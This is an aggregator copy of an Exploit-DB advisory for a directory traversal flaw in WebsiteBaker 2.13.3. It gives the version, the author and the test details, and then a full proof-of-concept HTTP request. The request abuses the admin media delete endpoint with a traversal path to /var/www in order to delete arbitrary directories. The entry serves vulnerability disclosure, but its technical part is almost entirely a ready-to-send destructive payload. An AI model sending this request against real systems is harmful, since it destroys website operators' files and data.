6

[webapps] WebsiteBaker v2.13.3 - Directory Traversal

 11 months ago
source link: https://www.exploit-db.com/exploits/51554
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

WebsiteBaker v2.13.3 - Directory Traversal

EDB-ID:

51554

EDB Verified:

Platform:

PHP

Date:

2023-07-03

Vulnerable App:

Exploit Title: WebsiteBaker v2.13.3 - Directory Traversal
Application: WebsiteBaker
Version: 2.13.3
Bugs:  Directory Traversal
Technology: PHP
Vendor URL: https://websitebaker.org/pages/en/home.php
Software Link: https://wiki.websitebaker.org/doku.php/en/downloads
Date of found: 26.06.2023
Author: Mirabbas Ağalarov
Tested on: Linux 


2. Technical Details & POC
=======================================

arbitary directory deleting

GET /admin/media/delete.php?dir=/../../../../../..//var/www&id=a838b6ebe8ba43a0 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/admin/media/browse.php?dir=/../../../../../..//var/www
Cookie: PHPSESSID-WB-6e6c39=bvnampsc5ji2drm439ph49143c; klaro=%7B%22klaro%22%3Atrue%2C%22mathCaptcha%22%3Atrue%7D
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK